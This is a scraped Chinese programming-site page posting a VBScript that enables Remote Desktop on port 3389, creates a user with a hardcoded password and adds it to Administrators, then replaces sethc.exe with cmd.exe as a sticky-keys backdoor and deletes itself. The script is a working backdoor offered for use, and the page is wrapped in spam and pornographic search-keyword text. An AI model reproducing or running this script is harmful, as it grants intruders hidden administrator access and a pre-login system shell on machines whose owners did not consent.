国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > VBScript > 正文

可自刪除 開啟3389創(chuàng)建用戶粘滯鍵后門的vbs

2020-07-26 11:54:46
字體:
供稿:網(wǎng)友
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer & "/root/default:StdRegProv")
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F&copy %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe&copy %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
發(fā)表評(píng)論 共有條評(píng)論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 宕昌县| 互助| 普陀区| 东方市| 蒲城县| 卓尼县| 馆陶县| 古交市| 江津市| 苏尼特右旗| 若尔盖县| 屏东市| 上犹县| 奇台县| 萝北县| 金寨县| 桂阳县| 浙江省| 鹿泉市| 黄大仙区| 聂拉木县| 雷州市| 永康市| 梓潼县| 达拉特旗| 南雄市| 绥阳县| 江孜县| 嵩明县| 平山县| 盈江县| 开平市| 淮安市| 凌源市| 鞍山市| 沧源| 台南市| 南丹县| 永年县| 延吉市| 吴堡县|